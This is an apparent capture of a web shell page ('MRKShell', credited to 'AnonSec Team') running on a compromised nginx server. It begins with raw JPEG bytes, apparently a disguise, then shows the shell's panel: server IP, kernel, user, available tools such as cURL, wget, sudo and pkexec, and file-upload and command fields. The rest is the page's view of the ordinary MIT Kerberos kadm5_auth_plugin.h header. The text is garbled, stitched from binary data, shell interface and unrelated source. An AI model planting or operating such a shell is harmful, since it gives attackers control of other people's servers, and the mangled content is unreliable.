JFIF # -$)%7&).0444#9?92>-240 5+#+4;224;652252222225222220222522225222522;2225222222"B!1AQa"q2B#R3br5CS/!12AQ"aRq#3 ??;}q7:bd%Ո>L8/$rsrQٷf=+e: Rb0Z6pN۰7b 1S`JAT K,-֥7(bNRb9CsD/s,9?}+KA]`,EΞ@@ 3ukq14""tD@D@D@D@D@D@D@D@D@D@D@ȓ|:^Yw-)G%AI/9pwVSнm@6=g7AA5tg18gj>F'J,{C3(q<*#AzX?[$va:Q4SԽ7Uԥ&,c}nF;3mO$DN}RySm\*I"}b%7GLj;gp{{FYs(p_xOJFtStǸMU蓰s95"#H'Uq>7F5[}>v%'Y,&CqMzn}m*Xo vl˳hrӦ V)))g`7$sz^%I-1leE]y%݉>?f}( *BNNñ𜤢S[i'T1 ӥԊ>NlHď~)pKw1.UsD LI/k]Sr\r=ߴMAZNKi+P}| qBS*G*z:Imk\_|l6A7߉H\z0賈'Zt_\u>4 {\#O[ERxzLvP wOLT C0ȴ]BAʷ7uNNINS,(DDDDDDDL8MY݂N$ dMK׭i2FesmNQ=?omKv]OVl^@&pɴ[t5+E`oy.E]Ϳ}$g(7y7&X+imcT\(cHɤ|=. C =yȗXʧpv=&cX*[X_i4 GtfFՓnbMjR@ thv4LO I0zlU-_*G!cH9`nԿ \k-~rS*c[}9]qbi~+%)(h($ s;dՒG_\ё[Q,plq!pEſA RZU0*\n]a~Md_3EZ { &8e:jR*dAkyۛs\B˞0Z5%6e`3;0slSx+Xȇ"*ozkE"vܬWاQ8r @ m5$ [/KNFycgrۑ@ {""""""|xd*@s7o~7BSG|܎vøGtЍL١ѬnK/, f~^~l/Ij+!JI'^;{˚*hӤJarʮ)ڱ[P^$;%.V FLJW̔?2ԭUpJe,~b%iW Yhz̻FAl|3ln"M4kM@$2wmͣp8JY)ݬ.]3vԩİ(P*Tb/1FXTg KŮ*C9jE[69d!GZȩMu!5`H\Cp"=wSAmJjCn&/*Q[kQ~b"zΕ~)aA(2EZ0(FÑp.66_φk}T5 YdRarK ɽLSj"SnR-N-Mz~F^Igb Jq(~X fH'Ӵp5_HN(ܰ,Ȍ䶛DK%a~?FuI}"p=U+j}'p&I_ɑ-x!IٮM:w|q;9M?.6x:ODѪ̬zTL`t^?8xJ$ Q cL4d/_xy ˔ SPGNgwSrrS/`5ӧKj ,hTpI=LѦ(,Pc4*4iESO?5sMz<`&_bsTO)fkX[ xqq::h9ifVۉ\_R }JVg~Jzm`(]:O &6IOghX6+HM 7X]RkUr{HL-"< >~28b{[><@6gF5&\1̹nVŕonZM7 (SF$l\sM];owE+IֹȫzɲDߌPcMQMG)b,N ;*!uo&rHT`s^7įĴz0?P&Ҫ3]@H:hڢFҢM~p{&0s?k}+Ι9׵mw >?"fs+Odٯ̌m(R9T:UpbkW=F*ZQh urk8C8@ҧeUԀyKS '.UP,NBcpFS6n=AJl*7 4<(XY_Cda/D=()b,{yHL>[jrǹ7#M7fO`o/w]GȈEU2f\?7a)#봙݂͠SEg>VRdPfF@PV"Ꮷ_(qCJG_0?1[% NKu$7&ۭ ߡ26U$`/ 3ES:/nek |\tmSg5 س}6/qDT "(*sP4SrX)%T(6y%_ Z9<%]B}oyyY"]76*U*vjijw i3D̍IS \Jnn9ۋ>%o;~)5u56槡'z* B5#5

5#a`,>1TW{Xɘ}G4"ҕ4z5F>e6*[\;%*U0LUUr2cpnݢkɜY͌3+bG0#el۴oe,,jO*M1X/3z)W^,p>s{ İQs:ޝd|w :fIe$~+ajXjnT80'S>KIUP&kNϒT=XlȞNڞ]Yz_K[Qׂގ\gq!nB@IoG *l;_뼳\RUeэkm)qh傢5KNz٘6ba:671k{  $N vfN]S7gxg=VjG;wBx t~l/"ʭl=ԝ6n[Dٛ]@"x)# E):\8Bvkcpv4O*;coJ?4ªMCA'.\zVð'w1USݻSlTyj/ gʕ,:S')ܴ]7!A^b%P׶ٮհU3 o\}XTp,e 597n}dk6UFrVǧ3qaR:BWn>Ѻ}oxKӦK)kܑKL tCs1#?升 v{r:u)?#ZxM=ڝYـ#e}JHBGTG>GsܞG2+~R̅Hש)$[*Hfx-ugx({ I7λwvYm~ |e'X#db@hW,0H8*J5AъA`;jȊY*&sh8Jn]"M>l3z%Րsy=Um'qF sX %,Uv|0W`Gzcy*V0'3R`5ޓ Hڙ>PWbw7;)[U(:krm>/ QU+)P>Hm!r -evY>wT7ԝe)^6_SN⚓ϫ('?2Sj5,[پd|+_Pv'[]t'mΝ2l}z/dz^E|"'J qED)R2ƂSg`9Ոu5~ d!G%>M6%pdcP-P L`ϼTQnA_,24G GneRn,XnߕSzV$ReBfZuE ,Z(yi?vO!clOYA [; c I|vCom+Hꡤ\eaӴ;XS|v4%FcϷAQ[yϢ_s+Ơ&pt}=%^Sb"#gĀ'[ oAUPzr;ȔZTy4t>f種ً>T؟GRgC^-WЖukS,G LV$ܱO餰%cp)[*X_v$@DDӢ3bE-V0֍?zySyadd\ j5": Bxi?;3a]1]ZFD澙rc|8uz/ CȎ3UTqb4'ҥX 6KʖYT2fPe$6 lGzSQTP} OL1q^*rxջQ_K?'?=V MR K IS HERE

MRKShell
Server IP : 172.67.193.120  /  Your IP : 172.71.28.167
Web Server : nginx/1.14.1
System : Linux comtuc2-s-2vcpu-8gb-160gb-intel-nyc3 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64
User : nginx ( 991)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/include/krb5/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /usr/include/krb5/kadm5_auth_plugin.h
/* -*- mode: c; c-basic-offset: 4; indent-tabs-mode: nil -*- */
/*
 * Copyright (C) 2017 by the Massachusetts Institute of Technology.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 *
 * * Redistributions of source code must retain the above copyright
 *   notice, this list of conditions and the following disclaimer.
 *
 * * Redistributions in binary form must reproduce the above copyright
 *   notice, this list of conditions and the following disclaimer in
 *   the documentation and/or other materials provided with the
 *   distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
 * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
 * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
 * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
 * COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
 * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
 * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
 * OF THE POSSIBILITY OF SUCH DAMAGE.
 */

/*
 * Declarations for kadm5_auth plugin module implementors.
 *
 * The kadm5_auth pluggable interface currently has only one supported major
 * version, which is 1.  Major version 1 has a current minor version number of
 * 1.
 *
 * kadm5_auth plugin modules should define a function named
 * kadm5_auth_<modulename>_initvt, matching the signature:
 *
 *   krb5_error_code
 *   kadm5_auth_modname_initvt(krb5_context context, int maj_ver, int min_ver,
 *                             krb5_plugin_vtable vtable);
 *
 * The initvt function should:
 *
 * - Check that the supplied maj_ver number is supported by the module, or
 *   return KRB5_PLUGIN_VER_NOTSUPP if it is not.
 *
 * - Cast the vtable pointer as appropriate for maj_ver:
 *     maj_ver == 1: Cast to krb5_kadm5_auth_vtable
 *
 * - Initialize the methods of the vtable, stopping as appropriate for the
 *   supplied min_ver.  Optional methods may be left uninitialized.
 *
 * Memory for the vtable is allocated by the caller, not by the module.
 */

#ifndef KRB5_KADM5_AUTH_PLUGIN_H
#define KRB5_KADM5_AUTH_PLUGIN_H

#include <krb5/krb5.h>
#include <krb5/plugin.h>

/* An abstract type for kadm5_auth module data. */
typedef struct kadm5_auth_moddata_st *kadm5_auth_moddata;

/*
 * A module can optionally include <kadm5/admin.h> to inspect principal or
 * policy records from requests that add or modify principals or policies.
 * Note that fields of principal and policy structures are only valid if the
 * corresponding bit is set in the accompanying mask parameter.
 */
struct _kadm5_principal_ent_t;
struct _kadm5_policy_ent_t;

/*
 * A module can optionally generate restrictions when checking permissions for
 * adding or modifying a principal entry.  Restriction fields will only be
 * honored if the corresponding mask bit is set.  The operable mask bits are
 * defined in <kadmin/admin.h> and are:
 *
 * - KADM5_ATTRIBUTES for require_attrs, forbid_attrs
 * - KADM5_POLICY for policy
 * - KADM5_POLICY_CLR to require that policy be unset
 * - KADM5_PRINC_EXPIRE_TIME for princ_lifetime
 * - KADM5_PW_EXPIRATION for pw_lifetime
 * - KADM5_MAX_LIFE for max_life
 * - KADM5_MAX_RLIFE for max_renewable_life
 */
struct kadm5_auth_restrictions {
    long mask;
    krb5_flags require_attrs;
    krb5_flags forbid_attrs;
    krb5_deltat princ_lifetime;
    krb5_deltat pw_lifetime;
    krb5_deltat max_life;
    krb5_deltat max_renewable_life;
    char *policy;
};

/*** Method type declarations ***/

/*
 * Optional: Initialize module data.  acl_file is the realm's configured ACL
 * file, or NULL if none was configured.  Return 0 on success,
 * KRB5_PLUGIN_NO_HANDLE if the module is inoperable (due to configuration, for
 * example), and any other error code to abort kadmind startup.  Optionally set
 * *data_out to a module data object to be passed to future calls.
 */
typedef krb5_error_code
(*kadm5_auth_init_fn)(krb5_context context, const char *acl_file,
                      kadm5_auth_moddata *data_out);

/* Optional: Release resources used by module data. */
typedef void
(*kadm5_auth_fini_fn)(krb5_context context, kadm5_auth_moddata data);

/*
 * Each check method below should return 0 to explicitly authorize the request,
 * KRB5_PLUGIN_NO_HANDLE to neither authorize nor deny the request, and any
 * other error code (such as EPERM) to explicitly deny the request.  If a check
 * method is not defined, the module will neither authorize nor deny the
 * request.  A request succeeds if at least one kadm5_auth module explicitly
 * authorizes the request and none of the modules explicitly deny it.
 */

/* Optional: authorize an add-principal operation, and optionally generate
 * restrictions. */
typedef krb5_error_code
(*kadm5_auth_addprinc_fn)(krb5_context context, kadm5_auth_moddata data,
                          krb5_const_principal client,
                          krb5_const_principal target,
                          const struct _kadm5_principal_ent_t *ent, long mask,
                          struct kadm5_auth_restrictions **rs_out);

/* Optional: authorize a modify-principal operation, and optionally generate
 * restrictions. */
typedef krb5_error_code
(*kadm5_auth_modprinc_fn)(krb5_context context, kadm5_auth_moddata data,
                          krb5_const_principal client,
                          krb5_const_principal target,
                          const struct _kadm5_principal_ent_t *ent, long mask,
                          struct kadm5_auth_restrictions **rs_out);

/* Optional: authorize a set-string operation. */
typedef krb5_error_code
(*kadm5_auth_setstr_fn)(krb5_context context, kadm5_auth_moddata data,
                        krb5_const_principal client,
                        krb5_const_principal target,
                        const char *key, const char *value);

/* Optional: authorize a change-password operation. */
typedef krb5_error_code
(*kadm5_auth_cpw_fn)(krb5_context context, kadm5_auth_moddata data,
                     krb5_const_principal client, krb5_const_principal target);

/* Optional: authorize a randomize-keys operation. */
typedef krb5_error_code
(*kadm5_auth_chrand_fn)(krb5_context context, kadm5_auth_moddata data,
                        krb5_const_principal client,
                        krb5_const_principal target);

/* Optional: authorize a set-key operation. */
typedef krb5_error_code
(*kadm5_auth_setkey_fn)(krb5_context context, kadm5_auth_moddata data,
                        krb5_const_principal client,
                        krb5_const_principal target);

/* Optional: authorize a purgekeys operation. */
typedef krb5_error_code
(*kadm5_auth_purgekeys_fn)(krb5_context context, kadm5_auth_moddata data,
                           krb5_const_principal client,
                           krb5_const_principal target);

/* Optional: authorize a delete-principal operation. */
typedef krb5_error_code
(*kadm5_auth_delprinc_fn)(krb5_context context, kadm5_auth_moddata data,
                          krb5_const_principal client,
                          krb5_const_principal target);

/* Optional: authorize a rename-principal operation. */
typedef krb5_error_code
(*kadm5_auth_renprinc_fn)(krb5_context context, kadm5_auth_moddata data,
                          krb5_const_principal client,
                          krb5_const_principal src,
                          krb5_const_principal dest);

/* Optional: authorize a get-principal operation. */
typedef krb5_error_code
(*kadm5_auth_getprinc_fn)(krb5_context context, kadm5_auth_moddata data,
                          krb5_const_principal client,
                          krb5_const_principal target);

/* Optional: authorize a get-strings operation. */
typedef krb5_error_code
(*kadm5_auth_getstrs_fn)(krb5_context context, kadm5_auth_moddata data,
                         krb5_const_principal client,
                         krb5_const_principal target);

/* Optional: authorize an extract-keys operation. */
typedef krb5_error_code
(*kadm5_auth_extract_fn)(krb5_context context, kadm5_auth_moddata data,
                         krb5_const_principal client,
                         krb5_const_principal target);

/* Optional: authorize a list-principals operation. */
typedef krb5_error_code
(*kadm5_auth_listprincs_fn)(krb5_context context, kadm5_auth_moddata data,
                            krb5_const_principal client);

/* Optional: authorize an add-policy operation. */
typedef krb5_error_code
(*kadm5_auth_addpol_fn)(krb5_context context, kadm5_auth_moddata data,
                        krb5_const_principal client, const char *policy,
                        const struct _kadm5_policy_ent_t *ent, long mask);

/* Optional: authorize a modify-policy operation. */
typedef krb5_error_code
(*kadm5_auth_modpol_fn)(krb5_context context, kadm5_auth_moddata data,
                        krb5_const_principal client, const char *policy,
                        const struct _kadm5_policy_ent_t *ent, long mask);

/* Optional: authorize a delete-policy operation. */
typedef krb5_error_code
(*kadm5_auth_delpol_fn)(krb5_context context, kadm5_auth_moddata data,
                        krb5_const_principal client, const char *policy);

/* Optional: authorize a get-policy operation.  client_policy is the client
 * principal's policy name, or NULL if it does not have one. */
typedef krb5_error_code
(*kadm5_auth_getpol_fn)(krb5_context context, kadm5_auth_moddata data,
                        krb5_const_principal client, const char *policy,
                        const char *client_policy);

/* Optional: authorize a list-policies operation. */
typedef krb5_error_code
(*kadm5_auth_listpols_fn)(krb5_context context, kadm5_auth_moddata data,
                          krb5_const_principal client);

/* Optional: authorize an iprop operation. */
typedef krb5_error_code
(*kadm5_auth_iprop_fn)(krb5_context context, kadm5_auth_moddata data,
                       krb5_const_principal client);

/*
 * Optional: receive a notification that the most recent authorized operation
 * has ended.  If a kadm5_auth module is also a KDB module, it can assume that
 * all KDB methods invoked between a kadm5_auth authorization method invocation
 * and a kadm5_auth end invocation are performed as part of the authorized
 * operation.
 *
 * The end method may be invoked without a preceding authorization method in
 * some cases; the module must be prepared to ignore such calls.
 */
typedef void
(*kadm5_auth_end_fn)(krb5_context context, kadm5_auth_moddata data);

/*
 * Optional: free a restrictions object.  This method does not need to be
 * defined if the module does not generate restrictions objects, or if it
 * returns aliases to restrictions objects contained from within the module
 * data.
 */
typedef void
(*kadm5_auth_free_restrictions_fn)(krb5_context context,
                                   kadm5_auth_moddata data,
                                   struct kadm5_auth_restrictions *rs);

/* kadm5_auth vtable for major version 1. */
typedef struct kadm5_auth_vtable_st {
    const char *name;           /* Mandatory: name of module. */
    kadm5_auth_init_fn init;
    kadm5_auth_fini_fn fini;

    kadm5_auth_addprinc_fn addprinc;
    kadm5_auth_modprinc_fn modprinc;
    kadm5_auth_setstr_fn setstr;
    kadm5_auth_cpw_fn cpw;
    kadm5_auth_chrand_fn chrand;
    kadm5_auth_setkey_fn setkey;
    kadm5_auth_purgekeys_fn purgekeys;
    kadm5_auth_delprinc_fn delprinc;
    kadm5_auth_renprinc_fn renprinc;

    kadm5_auth_getprinc_fn getprinc;
    kadm5_auth_getstrs_fn getstrs;
    kadm5_auth_extract_fn extract;
    kadm5_auth_listprincs_fn listprincs;

    kadm5_auth_addpol_fn addpol;
    kadm5_auth_modpol_fn modpol;
    kadm5_auth_delpol_fn delpol;
    kadm5_auth_getpol_fn getpol;
    kadm5_auth_listpols_fn listpols;

    kadm5_auth_iprop_fn iprop;

    kadm5_auth_end_fn end;

    kadm5_auth_free_restrictions_fn free_restrictions;
    /* Minor version 1 ends here. */
} *kadm5_auth_vtable;

#endif /* KRB5_KADM5_AUTH_PLUGIN_H */

Anon7 - 2022
AnonSec Team